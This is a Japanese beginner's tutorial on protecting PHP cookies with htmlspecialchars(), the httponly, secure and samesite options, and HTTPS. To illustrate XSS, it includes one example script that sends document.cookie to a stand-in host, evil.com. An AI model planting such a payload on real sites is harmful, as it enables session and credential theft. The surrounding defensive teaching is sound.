PHPのCookieセキュリティ対策をやさしく解説！XSSとHTTPSで安全にログイン情報を守る方法

1. Cookieとは？PHPでの使い方と基本の仕組み

1. Cookieとは？PHPでの使い方と基本の仕組み

Cookie（クッキー）は、Webサイトがユーザーのブラウザに一時的な情報を保存するための機能です。たとえば、ログイン状態を維持したり、買い物かごの中身を記憶するのに使われます。

PHPでは、setcookie()という関数を使ってCookieを設定できます。

例：

setcookie("user", "Taro", time() + 3600);

このコードは「user」という名前で「Taro」という値を持つCookieを、1時間（3600秒）ブラウザに保存します。

2. Cookieを使うときのセキュリティリスクとは？

2. Cookieを使うときのセキュリティリスクとは？

Cookieは便利ですが、セキュリティ上の注意点があります。特に以下の2つは重要です。

• XSS（クロスサイトスクリプティング）攻撃
• HTTPSを使っていないと情報が盗まれる危険

順番に見ていきましょう。

3. XSS（クロスサイトスクリプティング）とは？

3. XSS（クロスサイトスクリプティング）とは？

XSSとは、悪意のあるスクリプト（JavaScriptなど）をWebページに埋め込まれる攻撃のことです。攻撃者はこの方法でCookieの情報を盗むことができます。

たとえば、掲示板などに以下のような危険なコードが書き込まれていた場合：

<script>document.location='http://evil.com/steal.php?cookie='+document.cookie;</script>

このスクリプトが実行されると、あなたのブラウザに保存されたCookieが悪意のあるサイトに送信されてしまいます。

4. PHPでできるXSS対策方法

4. PHPでできるXSS対策方法

XSSを防ぐには、ユーザーが入力した文字列をそのまま表示しないことが重要です。PHPではhtmlspecialchars()を使って、入力内容を無害化できます。

例：

echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');

この関数は、<や>などの記号を別の形式に変換して、スクリプトが実行されないようにします。

5. Cookieのセキュリティオプションを設定しよう

5. Cookieのセキュリティオプションを設定しよう

PHPのCookieには、セキュリティを高めるためのオプションがいくつかあります。

• httponly：JavaScriptからCookieを読み取れなくする
• secure：HTTPS通信のときだけCookieを送る
• samesite：他のサイトからの不正アクセスを防ぐ

これらを設定した安全なCookieの例は次の通りです。

setcookie("user", "Taro", [
    'expires' => time() + 3600,
    'path' => '/',
    'secure' => true,
    'httponly' => true,
    'samesite' => 'Strict'
]);

この設定により、CookieはHTTPSでしか送信されず、JavaScriptでも読み取れず、他サイトからのリクエストもブロックされます。

6. HTTPSってなに？なぜPHPのCookieに必要なの？

6. HTTPSってなに？なぜPHPのCookieに必要なの？

HTTPS（エイチティーティーピーエス）は、Webページの通信を暗号化して安全にする仕組みです。URLが「https://」で始まるサイトがそれです。

HTTPSを使わないと、Cookieの情報が盗聴される危険があります。特にログイン情報などを扱うサイトでは必ず使うようにしましょう。

HTTPSを使っていれば、セキュリティオプションsecureを有効にできます。

7. 初心者向け！セキュリティ対策のチェックリスト

7. 初心者向け！セキュリティ対策のチェックリスト

初心者でも忘れないように、PHPでCookieを使うときのポイントをまとめます：

• ユーザーの入力は必ずhtmlspecialchars()で処理する
• Cookieはhttponlyとsecureを設定する
• Webサイトは必ずHTTPSにする
• samesiteオプションで外部からの攻撃を防ぐ

これらの対策をすれば、PHPでCookieを使っても安全にWebアプリケーションを運用できます。